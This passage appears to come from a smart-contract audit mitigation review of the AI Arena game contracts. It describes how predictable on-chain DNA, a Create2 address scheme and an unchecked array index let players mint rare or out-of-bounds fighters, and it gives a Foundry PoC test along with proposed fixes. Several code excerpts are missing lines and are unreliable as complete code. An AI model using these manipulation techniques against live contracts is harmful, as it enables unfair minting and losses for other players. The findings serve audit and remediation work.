We want to underline that this mechanism strongly changes after the mitigation. As long as the outcome of reRoll operation depended on msg.sender, buying a fighter with remaining reRoll operations made sense, because buyer reRoll operations would have different outcome then the seller ones.

After mitigation, seller and buyer can reach the same rare attributes. They both should be aware on the best outcome of reRoll operation. If not, it could happen because one or both of them are not cunning: the transfer could be not fair, impacting the game and the market.

So, after mitigation, the reRoll operation appears as a pretense to pay NRNs. Its initial aim is lost.

The only right thing to do is to reach the best numRerolls for each fighter

As we said above, remaining reRolls of a fighter don’t increase its market value. So, why a player should decide to not perform reRoll operations until reaching the best attributes combination? In this way, each player is forced to use NRNs to reach the best combination, because it doens’t make sense to have a non-optimal fighter: it hasn’t more market value and it can become a better fighter for sure.

A malicious player could wait the right tokenId to mint its fighter and reRoll it

A malicious player could wait to redeem his/her mint pass until he can obtain the wanted tokenId. This can be done because that player has foreseen that the wanted tokenId combined with a specific numRerolls permit obtaining a very rare fighter.


Now, the reRoll operation seems useless. It can be used only to have different battle traits (weight and element). So we propose reRoll modifies just the battle attributes.

If somebody would sell his/her fighter, remaining numRerolls doesn’t influence the fighter value. Before mitigation, there was the possibility that a new player with the right msg.sender would obtain better attrbutes for a fighter. Now, all players can obtain the same and foreseenable outcome from reRoll operations. Furthermore, now malicious players have the possibility to precompute dna despite their msg.sender and thus they can create fighter with wanted rare attributes.

Proof of concept

This is the mitigated FighterFarm.reRoll() operation:

/// @notice Rolls a new fighter with random traits.
/// @param tokenId ID of the fighter being re-rolled.
/// @param fighterType The fighter type.
function reRoll(uint256 tokenId, uint8 fighterType) public {
    require(msg.sender == ownerOf(tokenId));
    require(numRerolls[tokenId] < maxRerollsAllowed[fighterType]);
    require(_neuronInstance.balanceOf(msg.sender) >= rerollCost, "Not enough NRN for reroll");

    _neuronInstance.approveSpender(msg.sender, rerollCost);
    bool success = _neuronInstance.transferFrom(msg.sender, treasuryAddress, rerollCost);
    if (success) {
        numRerolls[tokenId] += 1;
        uint256 dna = uint256(keccak256(abi.encode(tokenId, numRerolls[tokenId])));
        (uint256 element, uint256 weight, uint256 newDna) = _createFighterBase(dna, fighterType);
        fighters[tokenId].element = element;
        fighters[tokenId].weight = weight;
        fighters[tokenId].physicalAttributes = _aiArenaHelperInstance.createPhysicalAttributes(
        _tokenURIs[tokenId] = "";

The dna is computed at line FighterFarm.sol#L424:

            uint256 dna = uint256(keccak256(abi.encode(tokenId, numRerolls[tokenId])));

It depends just on tokenId, which never change, and numRerolls[tokenId], which can change only using FighterFarm.reRoll() operation.

Let’s maxRerollsAllowed[fighterType] = 10. This means this fighter can be rerolled 10 times. We can forecast the dna results for each of 10 reroll operations. For example, we forecast that the 5th reRolled operation will reach the best attributes combination. So, we know before the first reRoll operation that it not makes sense to perform more than 5 reRolls.

If this fighter can not reach a good attributes combination, we could try to sell it, hoping we find a naive buyer, with all numRerolls available. On the other hand, if this fighter can reach a good attributes combination, we could make 5 reRolls, obtain the optimal attributes combination and use it in battles; or we could sell it, even before use 5 reRolls, because the reachable optimal attributes combination can be forecast by everyone, and it becomes an intrinsic value of the fighter

The issue relies on the pseudorandom mechanism. It is impossible to build a pseudorandom public mechanism that can’t be forecasted. Before the mitigation, an external source could be exploited to obtain the wanted reRoll outcomes. Now, the best outcome is intrinsic in fighter. Furthermore, a malicious player could still exploit the tokenId to obtain the wanted reRoll. We strongly suggest to use an external oracle or to add block.timestamp to the computation of dna, to make a bit harder to forecast outcome attributes.

Element and weight correlation when numElements is multiple of 31

Submitted by d3e4

Severity: Medium

When numElements is a multiple of 31 the DNA only generates 1/31 of all intended combinations of element and weight.

Proof of Concept

numElements maps to a uint8, i.e up to 255.
In FighterFarm._createFighterBase() element and weight are set as

uint256 element = dna % numElements[generation[fighterType]];
uint256 weight = dna % 31 + 65;

This means that if numElements[generation[fighterType]] is multiple of 31, say k*31 then only k*31 different combinations are possible instead of k*31 * 31, since (n + k*31) % (k*31) == (n + k*31) % 31.

Divide by the first mod to extract multiple smaller random numbers from one big random number.

uint256 weight = dna % 31 + 65;
dna = dna/31;
uint256 element = dna % numElements[generation[fighterType]];

ronnyx2017 (judge) commented:

True, n will be [0,31].

brandinho (AI Arena) commented:

The number of elements will never be 31. Our current plans in fact are for less than 10, but if we’re really pushing it then it might go as high as 16. We just used uint8 because it’s the smallest uint that we’re able to use. As such, this is not actually a risk to our project.

ronnyx2017 (judge) commented:

Yep, if you do not use more than 30 elements, then of course this issue will not be triggered. But the max of uint8 is 255, here has never been a maximum value check in the code. Moreover, the issue related to the value 31 also appeared in the original contest such as issue 1456 and issue 1979. No comments have ever mentioned this condition. In summary, this condition is neither in the code context nor in the context of this contest.

Players can exploit mintFromMergingPool dna calculation to mint rare fighter

Submitted by niser93, also found by d3e4

Severity: Medium

Related to the mitigation of: M-05 and its duplicates.

Specifically, this is strongly related to issue #1017 - Users can get benefited from DNA pseudorandomly calculation.

It describes 4 impacts:

  1. DNA malipulation in FighterFarm.reRoll(). It was mitigated in #16.
  2. DNA manipulation in FighterFarm.mintFromMergingPool()
  3. DNA malipulation in FighterFarm.redeemMintPass(). It was mitigated in #10.
  4. DNA malipulation in FighterFarm.claimFighters(). It was mitigated in #11.

We want to focus on 2. In issue #1017, it is reported:

In this case, the DNA is computed by the msg.sender (in this case will always be the \_mergingPoolAddress so it is not manipulable) and the number of existing fighters.

In this function a user can not manipulate the output hash, however, he can compute the hash for the upcoming fighters, because when a new fighter will be created, the fighters.length will change along with the output hash. As a result, a user can claim the MergingPool reward to mint and NFT when the output hash will be benefitial for him.

So, before mitigation, a user can not manipulate the output hash, but can claim the MergingPool reward to mint and NFT when the output hash will be benefitial for him.

Attempted mitigation was made in #3:

@@ -321,7 +321,7 @@ contract FighterFarm is ERC721, ERC721Enumerable {
        require(msg.sender == _mergingPoolAddress);
-           uint256(keccak256(abi.encode(msg.sender, fighters.length))), 
+           uint256(keccak256(abi.encode(to, fighters.length))), 

We think that this mitigation doesn’t solve the issue. Furthermore, it introduces a new vulnerability. Now, the user can manipulate the output hash, because it depends on the to address, which can be manipulated by the user.

Proof of Concept

The PoC of this issue is similar to the ones in #53 and #519.

After mitigation, the attributes of the fighter obtained using the FighterFarm.mintFromMergingPool() depends on two parameters:

/// @notice Mints a new fighter from the merging pool.
/// @dev Only the merging pool contract address is authorized to call this function.
/// @param to The address that the new fighter will be assigned to.
/// @param modelHash The hash of the ML model associated with the fighter.
/// @param modelType The type of the ML model associated with the fighter.
/// @param customAttributes Array with [element, weight] of the newly created fighter.
function mintFromMergingPool(
    address to, 
    string calldata modelHash, 
    string calldata modelType, 
    uint256[2] calldata customAttributes
    require(msg.sender == _mergingPoolAddress);
        uint256(keccak256(abi.encode(to, fighters.length))), 

The value passed to line L366 represents the dna. It depends on the to address and the fighters.length.

FighterFarm.mintFromMergingPool() can be called successfully just by the contract at _mergingPoolAddress, i.e., MergingPool.sol, using the MergingPool.claimRewards() method:

/// @notice Allows the user to batch claim rewards for multiple rounds.
/// @dev The user can only claim rewards once for each round.
/// @param modelURIs The array of model URIs corresponding to each round and winner address.
/// @param modelTypes The array of model types corresponding to each round and winner address.
/// @param customAttributes Array with [element, weight] of the newly created fighter.
function claimRewards(
    string[] calldata modelURIs, 
    string[] calldata modelTypes,
    uint256[2][] calldata customAttributes,
    uint32 totalRoundsToConsider
    external nonReentrant
    uint256 winnersLength;
    uint32 claimIndex = 0;
    uint32 lowerBound = numRoundsClaimed[msg.sender];
    require(lowerBound + totalRoundsToConsider < roundId, "MergingPool: totalRoundsToConsider exceeds the limit");
    uint8 generation = _fighterFarmInstance.generation(0);
    for (uint32 currentRound = lowerBound; currentRound < lowerBound + totalRoundsToConsider; currentRound++) {
        numRoundsClaimed[msg.sender] += 1;
        winnersLength = winnerAddresses[currentRound].length;
        for (uint32 j = 0; j < winnersLength; j++) {
            require(customAttributes[j][0] < _fighterFarmInstance.numElements(generation), "MergingPool: element out of bounds");
            require(customAttributes[j][1] >= 65 && customAttributes[j][1] <= 95, "MergingPool: weight out of bounds");
            if (msg.sender == winnerAddresses[currentRound][j]) {
                claimIndex += 1;
    if (claimIndex > 0) {
        emit Claimed(msg.sender, claimIndex);

So, a player can mintFromMerginPool only when he/she claims a reward after he/she wins a battle.

Let’s explain the attack vector. Before the next round, fighter.length = 0. Eve was able to forecast that a very rare fighter can be minted using a specific address, called address_E, and when fighter.length = 10. She can do that because she can precompute the dna value, and use AiArenaHelper.createPhysicalAttributes() to forecast the outcome attributes.

Using Create2, Eve can create a malicious contract at address address_E. Then Eve mints a new fighter using, for example, a mint pass and tries to win the current round. If she manages to do that, she can use the contract at address address_E to claim a reward at the current round.

Assuming that after this round, fighter.length = 0 still holds. The malicious contract could implement a call to MergingPool.claimRewards() that is called continuously and reverts until fighter.length = 10.

In this way, Eve is sure to claim a reward with address_E and fighter.length = 10, and thus obtain the fighter with wanted characteristics.

The problem relies on the usage of an external controlled input by a pseudorandom algorithm. We suggest introducing an oracle to obtain random input numbers, or at least to use block.timestamp, to make harder to forecast when the fighter.length reaches the wanted value:

/// @notice Mints a new fighter from the merging pool.
/// @dev Only the merging pool contract address is authorized to call this function.
/// @param to The address that the new fighter will be assigned to.
/// @param modelHash The hash of the ML model associated with the fighter.
/// @param modelType The type of the ML model associated with the fighter.
/// @param customAttributes Array with [element, weight] of the newly created fighter.
function mintFromMergingPool(
    address to, 
    string calldata modelHash, 
    string calldata modelType, 
    uint256[2] calldata customAttributes
    require(msg.sender == _mergingPoolAddress);
-       uint256(keccak256(abi.encode(to, fighters.length))), 
+       uint256(keccak256(abi.encode(to, fighters.length, block.timestamp))), 

Submitted by d3e4

Severity: Medium

Related to: ADD-05

Staking and unstaking is controlled in unison. If staking is possible during the battles, the only way to halt staking it is therefore to also halt unstaking. Users may thus stake during the battles and then suddenly not be able to unstake. It seems that if it was possible to stake during the battles it should always be possible to unstake again.

Contrast this with staking and unstaking outside of battles where users can be expected to make up their minds about how much they want to stake before the battles start, and then be committed to this stake (i.e. allowedStakingDuringRanked remains false).

Being allowed to stake during battles should be interpreted as an added opportunity for the user, with an added risk. The opportunity should not be possible to revoke without also allowing the user to withdraw from the added risk.

Consider not allowing a true allowedStakingDuringRanked be set to false while rankedOpen == true. This way the admin’s decision to allow staking during battles will always allow users to unstake until the end of the battles.

ronnyx2017 (judge) commented via issue #39:

Although warden’s description makes sense, I am more inclined to believe that this is the sponsor’s intentional design of timing control and economic model, rather than a bug.

Would like further review by sponsors.

brandinho (AI Arena) commented via issue #39:

This is a great point. We did not have the intention of allowing admins to change allowedStakingDuringRanked while ranked is open. But I think your recommendation of explicitly putting a require in there to prevent accidents is preferred, so we will also implement this recommendation.

ronnyx2017 (judge) commented via issue #39:

Based on the sponsor’s comments, we can classify the preconception condition of this issue as unintentional admin configuration. (Medium severity)

It’s not possible to claim MergingPool rewards for the last round, only for rounds previous to it

Submitted by fnanni

Severity: Medium

Related to the mitigation of: M-04: DoS in MergingPool::claimRewards function and potential DoS in RankedBattle::claimNRN function if called after a significant amount of rounds passed

Previously, The MergingPool::claimRewards function loop could exceed the block gas limit, potentially causing a DoS. This would happen if a user tried claiming their rewards after too many rounds had passed. Similarly, there was a risk of DoS in RankedBattle::claimNRN for the same reason.

In both cases, rounds were iterated up to the current round ID non inclusively.


PR #18

Now the issue in both functions is fixed thanks to an additional input uint32 totalRoundsToConsider which allows users to loop fewer rounds per call. However, the input validation of totalRoundsToConsider in MergingPool::claimRewards is incorrect:

    require(lowerBound + totalRoundsToConsider < roundId, "MergingPool: totalRoundsToConsider exceeds the limit");
    uint8 generation = _fighterFarmInstance.generation(0);
    for (uint32 currentRound = lowerBound; currentRound < lowerBound + totalRoundsToConsider; currentRound++) {

lowerBound + totalRoundsToConsider can at most be equal to roundId - 1, which means that claimRewards() will loop, at most, till roundId - 2. Therefore, it’s not possible to claim MergingPool rewards for the last round, only for rounds previous to it.

Note that this was correctly implemented in the RankedBattle::claimNRN fix.



    require(lowerBound + totalRoundsToConsider < roundId, "MergingPool: totalRoundsToConsider exceeds the limit");


    require(lowerBound + totalRoundsToConsider <= roundId, "MergingPool: totalRoundsToConsider exceeds the limit");


The mitigation works well but introduces an issue because the new function input is wrongly validated.

ronnyx2017 (judge) commented:

This is not a persistent DoS / stuck, but it is unfair for participants in the last round, even though the round is rolled over by the administrator. This also implies that there are scenarios where the round pauses. Overall, this type of non-persistent partial DoS/logic error in invariants falls under category Medium, IMO.

A player who wants to call MergingPool.claimRewards() has to pass parameters with at least winnersLength elements

Submitted by niser93

Severity: QA (Low / Non-Critical)

Related to mitigation of: M-03

M-03 finding reports that Fighter created by mintFromMergingPool can have arbitrary weight and element.

To mitigate this issue, developers added two lines to MergingPool.claimRewards() method, that is the only one which can call FighterFarm.mintFromMergingPool():


    function claimRewards(
        string[] calldata modelURIs, 
        string[] calldata modelTypes,
        uint256[2][] calldata customAttributes,
        uint32 totalRoundsToConsider
        external nonReentrant
        uint256 winnersLength;
        uint32 claimIndex = 0;
        uint32 lowerBound = numRoundsClaimed[msg.sender];
        require(lowerBound + totalRoundsToConsider < roundId, "MergingPool: totalRoundsToConsider exceeds the limit");
        uint8 generation = _fighterFarmInstance.generation(0);
        for (uint32 currentRound = lowerBound; currentRound < lowerBound + totalRoundsToConsider; currentRound++) {
            numRoundsClaimed[msg.sender] += 1;
            winnersLength = winnerAddresses[currentRound].length;
            for (uint32 j = 0; j < winnersLength; j++) {
+               require(customAttributes[j][0] < _fighterFarmInstance.numElements(generation), "MergingPool: element out of bounds");
+               require(customAttributes[j][1] >= 65 && customAttributes[j][1] <= 95, "MergingPool: weight out of bounds");
                if (msg.sender == winnerAddresses[currentRound][j]) {
                    claimIndex += 1;
        if (claimIndex > 0) {
            emit Claimed(msg.sender, claimIndex);

These two lines check the values of customAttributes passed by the player who is claiming the reward.

We want to report two issues:

Unmitigated risk

It is still possible to pass customAttributes out of the bound. For example, if the maximum value of winnersLength is 5 and a player tries to claim 6 rewards, the 6th will be not checked. The following is a coded POC:

function testClaimRewardsCustomAttributesOutOfBound() public {
        address user0 = vm.addr(1);
        address user1 = vm.addr(2);
        address user2 = vm.addr(3);


        uint256 totalRound = 6;

        uint256[] memory _winners013 = new uint256[](2);
        _winners013[0] = 0;
        _winners013[1] = 1;

        uint256[] memory _winners023 = new uint256[](2);
        _winners023[0] = 0;
        _winners023[1] = 2;

        uint256 totalWinUser1 = 0;
        for (uint i = 0; i < totalRound; i++) {
            if (i%2 == 0) {
                totalWinUser1 += 1;
            } else {

        string[] memory _modelURIs = new string[](totalWinUser1);
        string[] memory _modelTypes = new string[](totalWinUser1);
        uint256[2][] memory _customAttributes = new uint256[2][](totalWinUser1);

        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelTypes[0] = "original";
        _customAttributes[0][0] = uint256(1);
        _customAttributes[0][1] = uint256(80);

        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelTypes[1] = "original";
        _customAttributes[1][0] = uint256(1);
        _customAttributes[1][1] = uint256(80);

        _modelURIs[2] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelTypes[2] = "original";
        _customAttributes[2][0] = uint256(10);
        _customAttributes[2][1] = uint256(99);

            uint32(totalRound - 1)

        uint256 numRewards = _mergingPoolContract.getUnclaimedRewards(user1);
        assertEq(numRewards, 0);

        assertEq(_fighterFarmContract.balanceOf(user1), 4);

emit FighterCreated(id: 5, weight: 99, element: 10, generation: 0)

However, M-03 is out of scope. I would just report that this risk is not mitigated.

The wrong usage of index forces players to create and pass an array of customAttributes

Even if a player want to claim one reward, he/she has to pass to MergingPool.claimRewards() arrays with at least winnersLength elements, where winnersLength is the maximum value among winnerAddresses[round].length for analyzed rounds (i.e. rounds in the selected interval).

We suggest to change these two lines:

@@ -156,9 +156,9 @@ contract MergingPool is ReentrancyGuard{
             numRoundsClaimed[msg.sender] += 1;
             winnersLength = winnerAddresses[currentRound].length;
             for (uint32 j = 0; j < winnersLength; j++) {
-                require(customAttributes[j][0] < _fighterFarmInstance.numElements(generation), "MergingPool: elemen
t out of bounds");
-                require(customAttributes[j][1] >= 65 && customAttributes[j][1] <= 95, "MergingPool: weight out of b
                 if (msg.sender == winnerAddresses[currentRound][j]) {
+                    require(customAttributes[claimIndex][0] < _fighterFarmInstance.numElements(generation), "
MergingPool: element out of bounds");
+                    require(customAttributes[claimIndex][1] >= 65 && customAttributes[claimIndex][1] <= 95, "
MergingPool: weight out of bounds");

M-03: Unmitigated

Submitted by fnanni, also found by niser93

Related to mitigation of: M-03: Fighter created by mintFromMergingPool can have arbitrary weight and element


When users minted new fighters through the MergingPool, validation for weight and element values, passed as input in the customAttributes array, was missing. Therefore, winners of MergingPool NFTs could arbitrarily assign any weight and element to their new fighters.


PR #16

The fixed implemented introduces input validation for the custom attributes provided in MergingPool::claimRewards. element is required to be smaller than the total number of possible elements for the current generation, while weight is required to be in the [65, 95] range:

require(customAttributes[j][0] < _fighterFarmInstance.numElements(generation), "MergingPool: element out of bounds");
require(customAttributes[j][1] >= 65 && customAttributes[j][1] <= 95, "MergingPool: weight out of bounds");

Users calling claimRewards provide one pair of customAttribute per claimable NFT. However, the customAttributes index checked is not the appropriate index claimIndex but th